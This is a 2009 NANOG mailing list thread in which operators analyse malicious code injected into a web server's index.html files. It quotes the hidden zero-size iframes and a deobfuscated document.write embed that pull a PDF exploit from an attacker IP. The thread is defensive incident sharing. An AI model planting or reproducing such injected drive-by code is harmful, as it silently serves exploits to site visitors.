nanog mailing list archives
Re: Malicious code just found on web server
From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:06:41 -0400
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>"); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed> That PDF is on the site, I haven't looked at it yet though. -ChrisAM http://securabit.com On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <berg () wins net> wrote:
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -----Original Message----- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog () nanog org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications berg () wins net 715-832-3726
Current thread:
- Re: Malicious code just found on web server, (continued)
- Re: Malicious code just found on web server Paul Ferguson (Apr 20)
- Re: Malicious code just found on web server Gadi Evron (Apr 20)
- RE: Malicious code just found on web server Chuck Schick (Apr 21)
- Re: Malicious code just found on web server Nathan Ward (Apr 21)
- Re: Malicious code just found on web server Nick Chapman (Apr 20)
- Re: Malicious code just found on web server Paul Ferguson (Apr 20)
- Re: Malicious code just found on web server Ingo Flaschberger (Apr 20)
- Re: Malicious code just found on web server Gadi Evron (Apr 20)
- Re: Malicious code just found on web server Kevin Oberman (Apr 21)
- Re: Malicious code just found on web server Chris Mills (Apr 17)
- Re: Malicious code just found on web server Paul Ferguson (Apr 17)
- Re: Malicious code just found on web server Paul Ferguson (Apr 17)
- Re: Malicious code just found on web server Chris Mills (Apr 17)
- Re: Malicious code just found on web server Jake Mailinglists (Apr 17)